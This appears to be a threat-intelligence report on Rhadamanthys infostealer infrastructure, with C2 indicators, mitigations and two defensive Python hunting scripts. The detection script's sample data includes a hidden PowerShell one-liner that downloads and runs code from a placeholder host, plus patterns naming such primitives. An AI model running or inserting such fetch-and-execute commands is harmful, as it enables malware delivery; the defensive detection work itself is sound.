Full Report
Hunting Rhadamanthys Infrastructure in the 2024 Holiday Season
Analysis Summary
# Threat Actor: Rhadamanthys
## Attribution & Identity
The threat actor is associated with the deployment and continuous updating of the **Rhadamanthys infostealer**. No specific nation-state or established group is explicitly named or attributed in the context, only the malware/operation name itself.
## Activity Summary
The actor is currently deploying infostealer campaigns with a particular focus on the 2024 holiday season. These campaigns rely on social engineering, typically distributing the payload via phishing emails with file attachments (e.g., malicious PDF files reported to contain the stealer). The actor demonstrates sophistication through rapid iteration; the latest version (0.7.0) was released in June 2024.
## Tactics, Techniques & Procedures
- **Delivery Mechanism:** Phishing emails containing password-protected ZIP files.
- **Initial Execution:** The ZIP archives contain LNK files which execute malicious PowerShell scripts.
- **Payload Retrieval:** The PowerShell script downloads the Rhadamanthys stealer directly into memory.
- **Malware Evolution:** Rapid iterations, incorporating advanced features.
- **Data Exfiltration Focus:** Specifically designed to extract cryptocurrency wallet seed phrases from images using AI-powered Optical Character Recognition (OCR).
- **Infrastructure Fingerprint (observed by the analyst, indicative of the actor's C2 hosting):** Servers running Microsoft IIS 8.0 on Windows Server 2012, identified via unique certificate fingerprints and JARM fingerprints.
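The delivery chain listed above (phishing ZIP, LNK, PowerShell, payload pulled straight into memory) maps onto process-creation telemetry. The following is an added defender-side example, not tooling from the report: the Sysmon-style field names, the sample events and the two-of-three scoring threshold are constructed assumptions for the demonstration.

```python
"""Flag process-creation events consistent with the LNK -> PowerShell ->
in-memory download chain. Added example; the event records below are
constructed (Sysmon-style field names), not telemetry from the report."""
import re
from typing import Dict, List, Tuple

# Parent typically seen when a user double-clicks an LNK (assumption; extend
# this set for archive tools that launch shortcuts directly).
LNK_LAUNCHER_PARENTS = {"explorer.exe"}

# PowerShell switches used to hide the window or bypass profile/policy.
STEALTH_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|(?:ep|executionpolicy)\s+bypass"
    r"|e(?:nc(?:odedcommand)?)?\s)",
    re.I,
)

# Download-and-execute primitives that keep the payload off disk.
MEMORY_DOWNLOAD = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-Expression"
    r"|\biex\b|FromBase64String",
    re.I,
)

Event = Dict[str, str]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Event) -> List[str]:
    """Return the indicators an event matches (empty list if none)."""
    reasons: List[str] = []
    if _basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if _basename(ev["ParentImage"]) in LNK_LAUNCHER_PARENTS:
        reasons.append("PowerShell spawned by explorer.exe (consistent with an LNK launch)")
    if STEALTH_FLAGS.search(ev["CommandLine"]):
        reasons.append("hidden window / no profile / policy bypass / encoded command")
    if MEMORY_DOWNLOAD.search(ev["CommandLine"]):
        reasons.append("in-memory download-and-execute primitive on the command line")
    return reasons


def is_suspicious(ev: Event, min_indicators: int = 2) -> bool:
    """Two of three indicators are required, so a lone admin script run with
    -NoProfile, or an interactive shell opened from Explorer, is not flagged."""
    return len(score_event(ev)) >= min_indicators


def detect(events: List[Event]) -> List[Tuple[str, List[str]]]:
    return [(ev["EventId"], score_event(ev)) for ev in events if is_suspicious(ev)]


# Constructed sample events (placeholder.invalid cannot resolve).
SAMPLE_EVENTS: List[Event] = [
    {"EventId": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/stage')\""},
    {"EventId": "2", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"EventId": "3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"EventId": "4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventId": "5", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\agent\health.ps1"},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS):
        print(event_id, reasons)
```

Only event 1 is flagged: it carries all three indicators. Events 3 and 5 each match a single indicator and stay below the threshold, which is the trade-off to tune against local PowerShell usage before deploying such a rule.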
## Targeting
- **Sectors:** Travel and shopping platforms are explicitly abused as social-engineering themes for initial access. The malware's capability to steal crypto seed phrases suggests targeting of individuals or entities managing digital assets.
- **Geography:** Not explicitly detailed, though the infrastructure analysis touches on global IP space.
- **Victims:** General targets within compromised sectors; no specific named organizations mentioned.
## Tools & Infrastructure
- **Malware families used:** Rhadamanthys infostealer (versions up to 0.7.0).
- **Infrastructure (C2, domains, IPs; defanged):**
  - Services on port 7257 (HTTP) presenting Microsoft IIS 8.0 banners.
  - Infrastructure identified via SHA-256 certificate hash: `9eb7407fb6363c4d2a191afb9c5ed8cb16c41a68a87d60fa7dc6294f6b2c4892`.
  - Infrastructure identified via a specific JARM fingerprint, exposing OpenSSH 8.0 on port 22 and identified as running Windows Server 2012.
- **IOCs (IPs):**
  - Services Banner IOCs: 88[.]210.12.126, 103[.]148.58.151, 104[.]37.175.232, 185[.]234.216.132, 154[.]216.19.192, 193[.]124.205.63, 103[.]148.58.152, 45[.]200.149.186, 179[.]61.251.153, 38[.]55.97.42, 45[.]155.220.96, 45[.]200.149.72, 185[.]196.8.68, 185[.]196.8.56.
  - Services Certificate IOCs: 185[.]196.10.135, 185[.]196.8.68, 185[.]196.8.76, 185[.]196.11.18.
  - JARM IOCs: 185.209.162[.]23, 223.68.141[.]147, 8.134.34[.]5, 39.101.197[.]84.
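The IOC lists above are published defanged and in three separate groups, so a practitioner's first step is to refang and merge them before matching egress logs. The following is an added example, not tooling from the report: the indicator strings are copied from the lists above, while the key=value log lines and the field names are constructed for the demonstration.

```python
"""Refang the IOCs published in this report and hunt for them in outbound
connection logs. Added example; the IOC strings are copied from the report,
the log lines and their key=value layout are constructed."""
import re
from typing import List, Set, Tuple

# Indicator lists exactly as published in the report (defanged).
SERVICE_BANNER_IOCS = (
    "88[.]210.12.126, 103[.]148.58.151, 104[.]37.175.232, 185[.]234.216.132, "
    "154[.]216.19.192, 193[.]124.205.63, 103[.]148.58.152, 45[.]200.149.186, "
    "179[.]61.251.153, 38[.]55.97.42, 45[.]155.220.96, 45[.]200.149.72, "
    "185[.]196.8.68, 185[.]196.8.56"
)
CERT_IOCS = "185[.]196.10.135, 185[.]196.8.68, 185[.]196.8.76, 185[.]196.11.18"
JARM_IOCS = "185.209.162[.]23, 223.68.141[.]147, 8.134.34[.]5, 39.101.197[.]84"
CERT_SHA256 = "9eb7407fb6363c4d2a191afb9c5ed8cb16c41a68a87d60fa7dc6294f6b2c4892"
REPORTED_PORT = 7257  # HTTP service with an IIS 8.0 banner, per the report


def refang(indicator: str) -> str:
    """Reverse the common defanging conventions so values can be compared."""
    return (indicator.strip()
            .replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http"))


def parse_ioc_list(csv: str) -> Set[str]:
    return {refang(tok) for tok in csv.split(",") if tok.strip()}


# One de-duplicated set; 185.196.8.68 appears in two of the published lists.
IOC_IPS: Set[str] = (parse_ioc_list(SERVICE_BANNER_IOCS)
                     | parse_ioc_list(CERT_IOCS)
                     | parse_ioc_list(JARM_IOCS))

# Constructed key=value layout: dst, dpt and an optional server-cert hash
# (the last field assumes a TLS-inspecting sensor).
LOG_RE = re.compile(
    r"dst=(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s+dpt=(?P<dpt>\d+)"
    r"(?:\s+cert_sha256=(?P<sha>[0-9a-fA-F]{64}))?"
)


def match_line(line: str) -> List[str]:
    """Return the reasons a log line touches the reported infrastructure."""
    reasons: List[str] = []
    m = LOG_RE.search(line)
    if not m:
        return reasons
    if m["dst"] in IOC_IPS:
        reasons.append(f"destination {m['dst']} is in the report's IOC list")
    if int(m["dpt"]) == REPORTED_PORT:
        reasons.append(f"destination port {REPORTED_PORT} matches the reported IIS 8.0 service")
    if m["sha"] and m["sha"].lower() == CERT_SHA256:
        reasons.append("server certificate SHA-256 matches the reported C2 certificate")
    return reasons


def hunt(lines: List[str]) -> List[Tuple[str, List[str]]]:
    hits = []
    for line in lines:
        reasons = match_line(line)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample egress log (RFC 5737 addresses for the non-IOC hosts).
SAMPLE_LOGS = [
    "2024-12-20T10:15:02Z action=allow src=10.0.0.12 dst=185.196.8.68 dpt=7257 proto=tcp",
    "2024-12-20T10:15:09Z action=allow src=10.0.0.31 dst=198.51.100.20 dpt=443 proto=tcp",
    "2024-12-20T10:16:44Z action=allow src=10.0.0.12 dst=203.0.113.10 dpt=443 "
    "cert_sha256=9eb7407fb6363c4d2a191afb9c5ed8cb16c41a68a87d60fa7dc6294f6b2c4892",
    "2024-12-20T10:17:01Z action=allow src=10.0.0.7 dst=8.134.34.5 dpt=443 proto=tcp",
    "2024-12-20T10:17:30Z action=allow src=10.0.0.7 dst=10.0.0.1 dpt=22 proto=tcp",
]

if __name__ == "__main__":
    for line, reasons in hunt(SAMPLE_LOGS):
        print(line.split()[0], "->", "; ".join(reasons))
```

The third sample line shows why the certificate hash is worth matching on its own: the destination is not in any published IP list, but the same certificate on a new host still ties the connection to the reported infrastructure. The port check is deliberately a separate, weaker reason; port 7257 alone is a lead to triage, not a confirmed indicator.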
## Implications
The actor presents a significant, evolving threat due to the high development speed of Rhadamanthys. The inclusion of AI-powered OCR specifically targeting cryptocurrency seed phrases indicates a high-value objective focused on financial theft, making this actor a key threat to the cryptocurrency ecosystem during periods of heightened online activity (such as the holiday season). The use of a legacy OS (Windows Server 2012) in the infrastructure suggests either a deliberate choice of stable, older environments or infrastructure that is poorly maintained and hardened.
## Mitigations
- Enhance phishing detection and train users globally on recognizing social engineering attempts, especially those using trusted holiday/shopping themes.
- Implement advanced email filtering to block malicious ZIP attachments and LNK files.
- Deploy memory scanning and endpoint detection and response (EDR) capable of detecting fileless execution stemming from PowerShell invoking suspicious payloads.
- For crypto users, avoid storing seed phrases or wallet backups digitally, especially on systems subject to web browsing or email interaction.
- Focus network segmentation and egress monitoring on anomalous outbound connections to newly provisioned or low-reputation IPs matching the identified C2 infrastructure patterns (IIS 8.0 banners, the listed certificate hash and JARM fingerprints).